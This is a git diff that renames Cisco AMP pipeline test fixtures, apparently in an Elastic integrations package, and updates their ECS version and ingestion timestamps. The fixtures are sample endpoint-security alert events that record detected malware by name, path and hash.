diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 26bab6555f6..2774990edfc 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843493642Z", + "ingested": "2021-09-13T18:07:04.510322261Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -96,7 +96,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -116,7 +116,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843500994Z", + "ingested": "2021-09-13T18:07:04.510327231Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "kind": "alert", "start": "2021-01-14T20:38:26.000Z", @@ -172,7 +172,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -192,7 +192,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843503140Z", + "ingested": "2021-09-13T18:07:04.510329357Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -247,7 +247,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -267,7 +267,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843505081Z", + "ingested": "2021-09-13T18:07:04.510331307Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -333,7 +333,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -363,7 +363,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843507024Z", + "ingested": "2021-09-13T18:07:04.510333230Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -424,7 +424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -456,7 +456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843508958Z", + "ingested": "2021-09-13T18:07:04.510335159Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -518,7 +518,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -548,7 +548,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843510902Z", + "ingested": "2021-09-13T18:07:04.510337055Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -609,7 +609,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -641,7 +641,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843512823Z", + "ingested": "2021-09-13T18:07:04.510338972Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -694,7 +694,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -714,7 +714,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843514761Z", + "ingested": "2021-09-13T18:07:04.510340840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -765,7 +765,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -785,7 +785,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843516637Z", + "ingested": "2021-09-13T18:07:04.510342728Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -836,7 +836,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -856,7 +856,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843518525Z", + "ingested": "2021-09-13T18:07:04.510344635Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -911,7 +911,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -931,7 +931,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843520650Z", + "ingested": "2021-09-13T18:07:04.510346697Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -986,7 +986,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1006,7 +1006,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843522517Z", + "ingested": "2021-09-13T18:07:04.510348605Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1061,7 +1061,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1081,7 +1081,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843524393Z", + "ingested": "2021-09-13T18:07:04.510350482Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1136,7 +1136,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1156,7 +1156,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843526269Z", + "ingested": "2021-09-13T18:07:04.510352372Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1211,7 +1211,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
